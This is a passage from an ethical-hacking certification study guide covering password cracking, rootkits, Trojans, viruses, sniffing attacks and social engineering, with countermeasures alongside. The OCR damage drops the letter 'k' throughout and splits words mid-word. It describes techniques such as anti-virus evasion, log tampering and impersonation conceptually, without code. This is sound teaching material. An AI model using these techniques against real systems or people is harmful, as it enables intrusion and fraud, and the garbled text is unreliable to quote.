c) Keyloggers are a type of spyware that runs in the bac ground and allows recor ding of eystro es Hash Injection Attac - An attac er injects a compromised hash into a local sessi on and uses the hash to validate and gain access to networ resources Rainbow Attac s: Pre-Computed Hash 1. Rainbow table-A rainbow table is a precomputed table for reversing cryptograp hic hash functions, usually for crac ing password hashes
2. Computed Hashes- Computes the hash for a list of possible passwords and then compares it with the precomputed hash table. If a match is found then the password is crac e d
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg 3. Compare the Hashes- It is easy to recover passwords by comparing the captured password hashes to the precomputed tables
Distributed Networ Attac (DNA)- is a technique used to recover password protec ted files. In the past, recoveries have been limited to the processing power of one machine. DNA uses th e power of machines across the networ or across the world to decrypt passwords Non-Electronic Attac s Social Engineering- is the art of manipulating people into performing actions or divulging confidential information, in contrast to brea ing in or using technical crac ing techniques. Shoulder surfing- Unauthorized viewing of either the user s eyboard or screen whi le he/she is logging in Dumpster Diving-Searching for sensitive information in residential or commercial trash bins, printer trash bins, or at a user s des
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Automatic Password Crac ing Algorithm . . . . . . . Find a valid user Find encryption algorithm used Obtain encrypted passwords Create list of possible passwords Encrypt each word See if there is a match for each user ID Repeat steps 1 through 6
The vulnerability does not arise from the hashing process but from the storage. Most systems do not "decrypt" the stored password during authentication, but store the one-way hash. During the login process, the password entered is run through the algorithm generating a one-way hash and compared to the hash stored on the system. If they are the same, it is assumed the proper password was supplied. Therefore all that an attac er has to do in order to crac a password is to get a copy of the one-way hash stored on the server, and then use the algorithm to generate his/her own hash un til they get a match. Privilege Escalation Privilege escalation is the act of exploiting a bug, design flaw or configuratio n oversight in an operating system or software application to gain elevated access to resources that are nor mally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actio ns.
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Executing Applications Attac ers execute malicious applications in this stage. This is called system. Keylogger Keystro e logging is the action of trac ing (or logging) the eys struc on a e yboard, typically in a covert manner so that the person using the eyboard is unaware that their actions are b eing monitored. There are numerous eylogging methods, ranging from hardware and software-based approa ches to electromagnetic and acoustic analysis. Spyware Spyware is a type of malware that can be installed on computers, and which colle cts small pieces of information about users without their nowledge. The presence of spyware is typi cally hidden from the user, and can be difficult to detect. Typically, spyware is secretly installed o n the user's personal computer. Sometimes, however, spywares such as eyloggers are installed by the o wner of a shared, corporate, or public computer on purpose in order to secretly monitor other user s. Spyware programs can collect various types of personal information, such as Inte rnet surfing habits and sites that have been visited, but can also interfere with user control of the co mputer in other ways, such as installing additional software and redirecting Web browser activity. Spyware is nown to change computer settings, resulting in slow connection speeds, different home pages, an d/or loss of Internet connection or functionality of other programs. owning the
Root its Root its are ernel programs that have the ability to hide themselves and cover up traces of their activities They replace certain operating system calls and utilities with their own modifie d versions of those routines -Kernel root its can be especially difficult to detect and remove because they o perate at the same security level as the operating system itself, and are thus able to interce pt or subvert the most trusted operating system operations. Any software, such as antivirus softwa re, running on the compromised system is equally vulnerable.[30] In this situation, no part of the system can be trusted. The attac er acquires root access to the system by installing a virus, Trojan, o r spyware in order to exploit it Root its allow the attac er to maintain hidden access to the system Detecting Root its Integrity Based Detection- compares a snapshot of file systems, boot records, or memory with a nown trusted baseline Signature Based Detection- This technique compares characteristics of all system processes and executable files with a database of now root it fingerprints Heuristic Detection- It loo s for deviations from normal system patterns and beh avior to find unidentified root its based on their execution path Cross View based Detection- This compares "trusted" raw data with "tainted" cont ent returned by an API (Application Programming Interface).
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg NTFS Data Stream NTFS Alternate Data Stream (ADS) is a Windows hidden stream that contains metada ta for the file such as attributes, word count, author name, and access and modification time of the files ADS has the ability to for data into existing files without changing or alterin g their functionality, size, or display to file browsing utilities ADS allow an attac er to inject malicious code on a breached system and execute them without being detected by the user What is Steganography? Steganography is the art and science of writing hidden messages in such a way th at no one, apart from the sender and intended recipient, suspects the existence of the message, a form of security through obscurity In digital steganography, electronic communications may include steganographic c oding inside of a transport layer, such as a document file, image file, program or protocol. Media files are ideal for steganography because of their large size. Subtle chan ges in a large file can easily go unnoticed. Steganalysis The goal of steganalysis is to identify suspected pac ages, determine whether or not they have a payload encoded into them, and, if possible, recover that payload.
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Covering Trac s Remove activity trac s Remove web activity trac s such as MRU (Most Recently Use d), coo ies, cache, temporary files, and history Disable Auditing use Auditpol
Tamper log files modify event log files, server log files, and proxy log files b y log poisoning or flooding Close all remote connections to the victim machine Close any opened port
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Module 6 Trojans and Bac doors Study Guide Objectives: . . . . . . . . . . What is a Trojan? Overt and Covert Channels Purpose of Trojans Indications of a Trojan Attac Common Ports Used By Trojans How to Infect Systems Using Trojans Types of Trojans How to Detect Trojans Evading Anti-Virus Techniques Trojan and Bac door Countermeasures
What is a Trojan? A Trojan is a remote access tool disguised as a different piece of software. Tro jans are set apart from other types of malware by the ability to phone home and allow a hac er to access a system in real time. Overt and Covert Channels Overt channels are those used in legitimate data traffic such as http traffic ov er port 80. Covert channel communication ta es place over channels that are not intended for data traffic o r by hiding information that violates security policy in an overt channel. Purpose of Trojans Trojans allow for a hac er to control a compromised computer just as if they had physical access. They can be used to obtain sensitive information such as passwords or to further open a computer for other attac s. Trojans are a multi-purpose tool of hac ers, used for many different types of at tac s. An attac er may use a Trojan for a specific purpose or for going after specific information. It is also possible to use a Trojan for information gathering at first and then ma e the compromised system a vailable to other hac ers for use as a zombie or proxy.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Indications of a Trojan Attac Almost any odd or unexpected behavior of a system could be lin ed to an infiltra tion by a Trojan. Many also have the ability to ill the tas manager and msconfig processes in order t o eep their processes from being disabled. The only guaranteed method of removing a Trojan is to reins tall the OS from nown good media. Common Ports Used By Trojans In the past Trojans used specific ports such as 31337 for Bac Orifice and 12345 for Netbus. These ports can be found with a Google search. However, it is common to use common ports in a covert manner as well. How to Infect Systems using Trojans When a Trojan is written, the malicious code is inserted into some sort of wrapp er that disguises the code as something benign li e a harmless jpg file or simple game. Once the Troja n is wrapped it can be placed on a website to be downloaded, emailed as an attachment, or placed on a U SB stic or cd. A CD /USB stic can be configured to autorun so that when an attac er intentiona lly leaves media for others to find, the person who finds the attac er s media will try to see what is on that mysterious CD or USB stic and un nowingly install the attac er s Trojan. The possibilities are endless.
Types of Trojans Trojans can be used over many different protocols, are delivered in numerous way s, and can be written with pinpoint target accuracy. These many faces of Trojans represent the differe nt types listed in the CEH courseware. By Method: Trojans that use a specific method of communication or deployment: VNC HTTP/HTTPS ICMP Command Shell Document Covert Channel Email FTP SPAM Trojans that have specific targets: Credit Card Trojans E-ban ing Trojans Mobile Trojans MAC OS X Trojans
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Trojans that have a specific payload or create a payload: Data hiding (Encrypts data, sometimes ransoms the ability to decrypt the data to the victim, (Ransomware) Destructive Botnet Trojan Proxy Server Trojan Defacement Trojan How to Detect Trojans Detecting Trojans relies on having a baseline to compare suspicious behavior aga inst. Trojans can cause suspicious traffic on open ports, create registry entries, files, folders, or sh ow up as new installed programs. The CEH expects you to be familiar with these activities. Evading AntiVirus Techniques Anti-Malware software attempts to identify Trojans by wrapper signature or by co de signature. A Trojan writer can avoid leaving a signature by using a wrapper or Trojan that was selfwritten. By changing the code itself, it appears different, and accomplishes the goal of the Trojan. A Trojan can also be bro en up into multiple pieces for deployment and then assembled at the victim to evade detection.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Trojan and Bac door Countermeasures Trojan s are an insidious threat. The most innocent loo ing file or program could be hiding a malicious payload. Trojans fit the idea of They are everyone, and they are no one. The only sure fire way of avoiding compromise is to not connect to the Internet. Even with this you could be compromised but the Trojan would be unable to phone home . Common Trojans can be detected by Anti-m alware software, but a personally written one will not always be caught. Trojans may be detected by loo ing for suspicious port activity or files, but they may hide in common port traffic or inject into other files. Education about the ris Trojans pose increases awareness and decreases the li e lihood of dangerous behavior li e downloading files from the internet and viewing un nown email atta chments. However, Trojans may be hidden in critical components for business or on website s that are commonly used.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Module 7 Viruses and Worms Study Guide Objectives: . . . . . . . . . . . . . . Introduction to Viruses Stages of Virus Life How a Virus wor s Virus Analysis Types of Viruses Writing a Simple Virus Program Computer Worms Worm Analysis What is a Sheep Dip Computer Malware Analysis Procedure Virus Detection Methods Virus and Worm Countermeasures Anti-Virus Tools Penetration testing for Viruses
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Introduction to Viruses A virus is a self-replicating program that produces its own code by attaching co pies of itself into other executable codes. A true virus can spread from one computer to another (in some form of executable code) when its host is ta en to the target computer; for instance because a user sent it over a netw or or the Internet, or carried it on a removable medium such as a floppy dis , CD, DVD, or USB drive. Some viruses affect computers as soon as their code is executed; other viruses l ie dormant until a predetermined logical circumstance is met Stages of Virus Life
Replication Virus replicates for a period of time within the target system and t hen spreads itself Launch It gets activated with the user performing certain actions such as runnin g an infected program Detection A virus is identified as a threat infecting target systems Anti-virus software developers assimilate defenses against the vir Users install anti-virus updates and eliminate the virus threats
Incorporation us Elimination
How a Virus Wor s Infection phase the virus replicates itself and attaches to an .exe file in the system. Some viruses infect each time they are run and executed completely and others infect only whe n users trigger them, which can include a day, time, or a particular event. Attac Phase Some viruses have trigger events to activate and corrupt systems.
Some have bugs that replicate and perform activities such as file deletion and d ecrease the session s time. Sometimes they corrupt targets only after spreading completely as intended by th eir developers
Design - Developing virus code using programming languages or construction
its
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Virus Analysis Why are viruses created? To inflict damage on competitors Financial Benefits Research Projects For Pran s Vandalism Cyber Terrorism Distribution of Political Messages
Processes ta e more resources and time Computer slows when programs start Files and Folders are missing Hard Drive is accessed often Unable to load OS Anti-Virus alerts Browser window freezes
How are Computers infected? Opening infected Email attachments Not running the latest anti-virus software Not updating and installing new versions of plug-ins Installing pirated software When a user accepts files and downloads without chec ing the source properly
Indications of a Virus attac
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Viruses Hoaxes - There are a lot of viruses out there. And then there are some v iruses that aren't really out there at all. Hoax virus warning messages are more than annoyances. After re peatedly becoming alarmed, only to learn that there was no real virus, computer users may get into the habit of ignoring all virus warning messages, leaving them especially vulnerable to the next real and truly destructive virus.
Types of Viruses System or Boot sector Viruses moves MBR to another location on the hard dis and copies itself to the original location of MBR. When system boots, virus code is executed first and th en control is passed to original MBR File Viruses File viruses infect executable files by inserting their code into s ome part of the original file so that the malicious code can be executed when the file is accessed. An overwri ting file virus is one that overwrites the original file entirely, replacing it with the malicious code. Fil e infecting viruses have targeted a range of operating system, including Macintosh, UNIX, DOS, and Window s. Overwriting viruses cause irreversible damage to the files. Example: Loveletter, which operated as an email worm, file virus, and Trojan dow nloader, is a notorious example of a file overwriting virus. Loveletter searched for certain file types and overwrote them with its own malicious code, permanently destroying the contents of those files. Files af fected by an overwriting virus cannot be disinfected and instead must be deleted and restored from bac up .
Example: Ghostball - It infected both executable .COM-files and boot sectors. Macro Viruses infect files created by Microsoft Word or Excel. Most are written in Visual Basic for Applications (VBA). Macro viruses infect templates or convert infected documents into template file, while maintaining their appearance of ordinary document files. Example: The Melissa Virus would spread on word processors Microsoft Word 97 and Word 2000 and also Microsoft Excel 97, 2000 and 2003. It could mass-mail itself from e-mail cl ient Microsoft Outloo 97 or Outloo 98.
Multipartite Viruses attempt to attac r program files at the same time.
both the boot sector and the executable o
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg If a Word document containing the virus, either LIST.DOC or another infected fil e, is downloaded and opened, then the macro in the document runs and attempts to mass mail itself. When the macro mass-mails, it collects the first 50 entries from the alias list or address boo and sends itself to the e-mail addresses in those entries. Cluster Viruses A type of virus that associates itself with the execution of pro grams by modifying directory table entries to ensure the virus itself will start when any program o n the computer system is started. If infected with a cluster virus it will appear as if every program on the computer system is infected; however, a cluster virus is only in one place on the system. Stealth / Tunneling Virus this virus actively hides itself from anti-virus softwa re by either mas ing the size of the file that it hides in or temporarily removing itself from the infect ed file. It places a copy of itself in another location on the drive, replacing the infected file with an uni nfected one that it has stored on the hard drive. Encryption Viruses - this type of virus uses encryption to mas its code. It is encrypted with a different ey or each infected file. AV scanners cannot directly detect these types of vir uses using signature detection methods Polymorphic Code uses encryption to transform its code into an alternate, encryp ted form. To execute, a polymorphic virus must decrypt itself bac to its original form. It w ill then mutate with new encryption. To enable the polymorphic code, the virus has to have a polymorphic engine (also called mutating engine or Encrypted Mutation Engine. A well-written polymorphic virus has no parts that stay the same on each infecti on. Metamorphic Viruses this virus actually ma es direct changes to its code, perman ently altering itself between each iteration. The code changes performed by a metamorphic virus are di rected by a metamorphic engine, which may itself be altered between iterations. This is th e counterpart to a polymorphic virus's polymorphic engine. The alterations in code carried out by a metamorphic virus ma e it much harder f or traditional signature-based antivirus programs to identify two separate iterations as one an d the same virus. Fortunately, the technical challenges involved in creating a functioning metamor phic virus are quite high, ma ing them very rare creations.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg File Overwriting or Cavity Viruses - A cavity virus attempts to install itself i nside of the file it is infecting. This is difficult to do. Most viruses ta e the easy way out when infecting files; they simply attach them selves to the end of the file and then change the start of the program so that it first points to the vir us and then to the actual program code. Many viruses that do this also implement some stealth techniques s o you don't see the increase in file length when the virus is active in memory. A cavity virus, on the other hand, attempts to be clever. Some program files, for a variety of reasons, have empty space inside of them. T his empty space can be used to house virus code. A cavity virus attempts to install itself in this e mpty space while not damaging the actual program itself. An advantage of this is that the virus t hen does not increase the length of the program and can avoid the need for some stealth techniques. Example: LeHigh Virus Sparse Infector Viruses they will infect only occasionally (e.g. every tenth pro gram executed), or only files whose lengths fall within a narrow range. Companion / Camouflage Viruses - instead of modifying an existing file, these vi ruses create a new program which (un nown to the user) is executed instead of the intended program. On exit, the new program executes the original program so that things appear no rmal. On PCs this has usually been accomplished by creating an infected .COM file with the same name a s an existing .EXE file. Integrity chec ing antivirus software that only loo s for modifications in exist ing files will fail to detect such viruses. Shell Viruses Virus code forms a shell around the target host program s code, ma i ng itself the original program and host code as its sub-routine Almost all boot program viruses are shell viruses File extension Viruses These viruses change the extensions of files. A counterme asure is to turn off Hide file extensions in Windows
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Add-on and Intrusive Viruses Add-on viruses append their code to the host code. Without ma ing any changes it will relocate the host code or insert its own code at the beginni ng. Intrusive viruses overwrite the host code partly or completely with viral code Transient and Terminate and Stay Resident Viruses The Transient virus will trans fer all controls of the host code to where it resides, then it will select the target program to be modi fied and corrupted.\ The Terminate and Stay virus (TSR) remains permanently in the memory during the entire wor session even after the target host s program is executed and terminated. The TSR can only be removed by rebooting the system.
Writing a Simple Virus Program There are many virus ma ers available to the public and most of them require no technical nowledge to create a virus.
Computer Worms Computer worms are malicious programs that replicate, execute, and spread across networ connections independently without human interaction. Most worms are created only to replicate and spread across a networ , consuming available computing resources; however, some worms carry a payload to damage the host system Attac ers can use worm payloads to install bac doors in infected computers, whic h in turn will ma e them susceptible to becoming zombies. As a zombie they will be part of a botnet used to carry out further cyber-attac s controlled by the worm author or whoever they sell the bot net to.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Worm Analysis Confic er Worm The first variant of Confic er, discovered in early November 2008, propagated t hrough the Internet by exploiting a vulnerability in a networ service (MS08-067) on Windows 2000, W indows XP, Windows Vista, Windows Server 2003, Windows Server 2008, and Windows Server 2008 R2 Beta . While Windows 7 may have been affected by this vulnerability, the Windows 7 Bet a was not publicly available until January 2009. Although Microsoft released an emergency out-of-ba nd patch on October 23, 2008 to close the vulnerability, a large number of Windows PCs (estimated at 30%) remained unpatched as late as January 2009. A second variant of the virus, discovered in December 2008, added the ability t o propagate over LANs through removable media and shares. Researchers believe that these were dec isive factors in allowing the virus to propagate quic ly: by January 2009, the estimated number o f infected computers ranged from almost 9 million to 15 million. Recent estimates of the number of infected computers have been notably more dif ficult because of changes in the propagation and update strategy of recent variants of the virus.
What is a Sheep Dip Computer? A sheepdip is the process of chec ing physical media, such as floppy dis s or CD -ROMs, for viruses before they are used in a computer. Typically, a computer that sheep dips is used only for that process and nothing else and is isolated from the other computers, meaning it is not connected to the networ . Most sheepdips use at least two different antivirus programs in ord er to increase effectiveness. The goal of sheep dipping is to bloc viruses from entering syste ms rather than waiting until they manifest on user wor stations at which time they will have already do ne their damage Anti-Virus Sensor Systems Anti-virus systems have a collection of computer software pac ages that detect a nd analyze malicious code threats such as viruses, worms, and Trojans. They are used along with sheep
dip computers
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Malware Analysis Procedure Preparing Test bed Install VMWare or Virtual PC on the system Install guest OS into the virtual machine
Disable shared folders and guest isolation Copy the malware over to the guest OS Note - At least two machines should be used. One machine is for hosting the mali cious binary (victim machine) and the other is for baselining and sniffing the networ traffic (sniff er machine). They should be networ ed in such a way that each of them is able to sniff the other's networ traffic. Malware Analysis Procedure
Virus Detection Methods Scanning Once a virus has been detected, it is possible to write scanning programs that l oo for signature string characteristics of the virus Integrity Chec ing These products wor by reading the entire dis and recording integrity data that acts as a signature for the files and system sectors Interception The interceptor monitors the operating system requests that are written to the d is
Isolate the system from the networ
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Virus and Worm Countermeasures Install anti-virus software that detects and removes infections as they appear Generate an anti-virus policy for safe computing, and distribute it to the staff Pay attention to the instructions while downloading files or any programs from t he Internet Update the anti-virus software on a monthly basis, allowing it to identify and c lean new bugs Avoid opening the attachments received from an un nown sender as viruses spread via e-mail attachments The possibility of virus infection may corrupt data, thus regularly maintain dat a bac -ups Schedule regular scans for all drives after the installation of anti-virus softw are Do not accept dis s or programs without scanning them with anti-virus software f irst
AntiVirus Tools AVG Antivirus BitDefender Kaspers y Trend Micro Norton AntiVirus Avast
Penetration Testing for Viruses Install Anti-Virus on the networ infrastructure and on the end-user s system Update Anti-Virus to update the virus database of the newly identified viruses Scan the system which helps to repair damage or delete files infected with virus es If the virus is not removed, go in to safe mode and delete infected files manual ly If any suspicious process, registry entries, startup program or service is disco vered, chec associated executable files Chec the startup programs and determine if all the programs can be recognized w ith nown functionalities Chec the data files for modification or manipulation by opening several files a nd comparing their hash value with a pre-computed hash
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg
Modu le 8 Sniffers Study Guide Objectives: . . . . . . . . . . Lawful Intercept Sniffing Threats Types of Sniffing Hardware Protocol Analyzers MAC Attac s DHCP Attac s ARP Poisoning Attac s Spoofing Attac Sniffing Tools Countermeasures
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Lawful Intercept Lawful Intercept is the policy of allowing a Law Enforcement Agency (LEA) to obt ain records of data transmissions across traditional communication lines through wiretaps, and also through internet services for voice and data with proper judicial order. This information is prov ided to an LEA after such an order has been received by the service provider. Sniffing Threats Monitoring traffic in a networ environment is called Sniffing. Using hardware o r software to capture traffic a hac er can read any data found in plaintext. This data can ta e the fo rm of web traffic, email traffic, passwords transmitted across protocol using plain text, and other traff ic. Sniffing relies on having physical access to a networ . Types of Sniffing Passive Sniffing Passive sniffing is monitoring pac ets on a networ segment that is not switched or bridged and can be seen by all machines on that segment. Hubs are outdated which ma es them a rare find, but it is still possible to sniff wireless networ s or networ s with compromised switches. Any n etwor card set to promiscuous mode connected to an open networ segment can read all the connected devices traffic because the traffic is not switched and sends the same data to all ports. Active Sniffing
In today s switch-based networ environments, a hac er injects pac et into networ traffic for a desired effect. This is active because you are actually causing a change instead of watc hing what occurs.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Hardware Protocol Analyzers OSI Model Vulnerable Protocols: Telnet HTTP SMTP NNTP POP FTP IMAP These protocols are vulnerable because they send some or all information in plai n text. This traffic is capable of being compromised at the Data Lin Layer (Layer 2 on the OSI model) w hich does not adhere to the restrictions of the upper levels. This allows for all of the traffic alon g these protocols to be compromised without issues in the higher OSI model layers. Hardware protocol analyzers are special equipment that monitor networ traffic a cross a cable without altering it and allow for precise information reading about that traffic. Using a piece of hardware li e this on the SPAN port of a switch, which is setup to receive of copy of pac ets sent across the switch, allows for capture and monitoring of all the con nections to that switch. MAC Attac s MAC Flooding This attac occurs when a switch is bombarded with requests with different sourc e MAC addresses. The Content Addressable Memory (CAM) table is usually of a small, fixed size; when i t reaches its maximum the switch begins to broadcast traffic to all connections, li e a hub. To defend against this some switches have the ability to limit the number of MAC addresses that can be learned on ports connected to end stations. An AAA (Authentication, Authorization, and Accounting) server can be used to aut henticate discovered MAC addresses as well
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg DHCP Attac s Dynamic Host Configuration Protocol (DHCP) is used to allow new hosts to connect to a networ easily, because of this functionality it can be insecure. It is important to remember th at attac s against DHCP ta e advantage of its functionality because it is permitted but in a manner that was not intended. DHCP Starvation This is a Denial of Service attac against a DHCP implementation. The attac er s ends out requests for an entire DHCP scope instead of just one address, eeping anyone else from connecti ng to the server. Rogue DHCP An attac er can run a DHCP for the same scope as the legitimate server, causing users to connect to the rogue. This server can then be used to eavesdrop on the users or intercept reque sts and send them to malicious sites. DHCP attac countermeasures Counter DHCP attac s can be done at the switch level by requiring DHCP traffic t o be restricted by port and to only travel to trusted servers. ARP Poisoning Attac s The Address Resolution Protocol maps an IP address to a physical machine address that is recognized on the local networ . An ARP table is created in networ ed devices containing this information. When a MAC address is not found in the table an ARP request is broadcast. When an answe r is found the machine updates the table with the address pair allowing communication. ARP spoofing occurs when these pac ets are forged. This can then fill the ARP ta ble, similar to a MAC Flood attac . ARP spoofing can also be used to Poison the ARP table with fictiti ous entries to enable snooping. Using these fa e ARP messages an attac er can divert communication to compromise a user or system. The ARP table can be bound to ports on a switch at the switch level to counter A RP poisoning.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Spoofing Attac s MAC Spoofing Attac s When an attac er can sniff out MAC addresses, they can use that information to s poof or duplicate the MAC in question and intercept or use a legitimate users MAC address to receive t hat users traffic. If the MAC address is used for networ identification, the attac er now has acce ss to what the legitimate user had access to by bypassing Access Control Lists on Routers and Servers. Usi ng spoofed MAC addresses is also used in other networ traffic attac s li e SYN floods and the Ping of Death. Countering spoofing attac s involves the use of binding tables and chec ing that MAC addresses do not change IPs on the switch they are connected to. DNS Poisoning The Domain Name system used to identify names human use into numbers computers u se can be tric ed by spoofing as well. A DNS server can be tric ed into accepted false inf ormation, poisoning the cache of names that are used to answer a client s request for a website or networ resource. When the user requests a website from a spoofed DNS server the user is sent to t he location the attac er has designated on the false server. In order to defend against these attac s it is recommended that you resolve all DNS requests locally, and use only trusted outside DNS servers as well. Configure firewalls to restrict ex ternal DNS loo ups so that users are forced to eep requests internal. DNSSEC or Secure DNS uses cryptograp hic electronic signatures signed with a trusted public ey certificate to confirm authentic tra ffic, implementing this protocol mitigates spoofing threats. Sniffing Tools
Kismet Snort
Wireshar
Countermeasures Sniffing with hardware requires physical access to the traffic that is being tar geted. By securing the physical location and access to networ equipment, a pac et capture device canno t be installed. Sniffing depends on traffic being in plaintext, encryption eeps this from occur ring. SSL and IPSec (Internet Protocol Security) are examples of encryption solutions.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg
Module 9 Social Engineering Study Guide Objectives: . What is Social Engineering? . Why is Social Engineering effective? . Phases in a Social Engineering attac . Common targets of Social Engineering . Types of Social Engineering . Common Intrusion Tactics and Strategies for Prevention . Social Engineering through Impersonation on Social Networ ing Sites . Ris s of Social Networ ing to Corporate Networ s . Identity Theft . Social Engineering Countermeasures . Social Engineering Pen Testing
What is Social Engineering? Social engineering is the art of manipulating people into performing actions or divulging confidential information Social engineers prey on people that are careless about protecting confidential information Why is Social Engineering Effective? There is no specific software or hardware for defending against a social enginee ring attac Security policies are as strong as their wea est lin , and humans are the most s usceptible factor It is difficult to detect social engineering attempts There is no method to ensure complete security from social engineering attac s
Research Researching a target company consists of dumpster diving, websites, employees, c ompany tours, etc. Develop In this phase relationships are built with selected employees, impersonations ma y be developed as well. Exploit Collect sensitive account information, financial information, and current techno logies Command Injection Attac s Online- Contacting employees anonymously over the Internet and persuading them t o provide information Telephone Requesting information usually through impersonating a legitimate user , either to access the telephone system itself or to gain remote access to compute r systems
Phases in a Social Engineering Attac
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Personal Approaches In personal approaches, attac ers get information by as ing for it directly
Common Targets of Social Engineering Receptionists/Help Des Personnel Technical Support Executives System administrators Vendors of the target organization Users and clients Types of Social Engineering Human-based Gathers sensitive information by interaction Attac s of this category exploit trust, fear, and the helping nature of humans An attac er can pose as a legitimate end user, a technical support person, or es sentially anyone that they feel will persuade someone to reveal information. Eavesdropping Unauthorized listening of conversations or reading of messages Interception of any form such as audio, video, or written Shoulder Surfing Attac ers can loo over someone s shoulder or view a target with binoculars to gai n confidential information Dumpster Diving Searching for useful documents or any other information in trash bins, printer s tations, or someone s des Tailgating
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg An unauthorized person enters a secured area by following closely behind an auth orized person to gain access without the need for a ey. This is done without the consent of the autho rized user
Piggybac ing Essentially the same principle as tailgating, however, the unauthorized person h as consent in this case. The authorized person allows an unauthorized individual to gain access with thei r credentials Reverse Social Engineering This is when the attac er creates a persona who appears to be in a position of a uthority so that employees will as him for information, rather than the other way around These attac s involve sabotage, mar eting, and tech support Computer-based Social engineering carried out with the help of computers Pop-Ups Can be used to tric users into clic ing a lin that redirects them to fa e webs ites as ing for personal information, or downloads malicious programs such as eyloggers,Trojans, or Spyw are Phishing An illegitimate email falsely claiming to be from a legitimate site attempts to acquire the user s personal or account information Social Engineering using SMS Insider Attac s Spying If a competitor wants to cause damage to your organization, steal critical secre ts, or put you out of business, they just have to find a job opening, prepare someone to pass the inte rview, have that person hired, and they will be in the organization Revenge It ta es only one disgruntled person to ta e revenge and your company is comprom ised -%60 of attac s occur from behind the firewall
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg -an inside attac is easy to launch and is difficult to prevent
Common Intrusion Tactics and Strategies for Prevention
Phone (Help Des ) Impersonation and Persuasion Train employees never to reveal information over the phone Building Entrance Unauthorized Physical Access ID Badge enforcement, Staff training, security officers Office Shoulder Surfing Frosted Glass, Not allowing others to view you typing Phone (Help Des ) Impersonating Help des calls Assign a PIN to employees for help des calls Office Wandering strangers Escort all guests Mail Room Insertion of forged memos Loc and monitor mail room Machine room/ Phone closet Attempting to gain access, remove Keep these spaces l oc ed equipment, attach rogue wireless eep updated inventories access points or protocol analyzers Phone and PBX Stealing phone access Control overseas and longdistance calls, trace calls, and refuse transfers Social Engineering through Impersonation on Social Networ ing Sites
Malicious users can gather information by impersonating others on social networ s.
Area of Ris
Attac er s Tactics Combat Strategy
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg This information can lead to an attac er creating large networ s of friends to e xtract information using social engineering techniques They can also use this information to carry out other forms of social engineerin g outside of the social networ
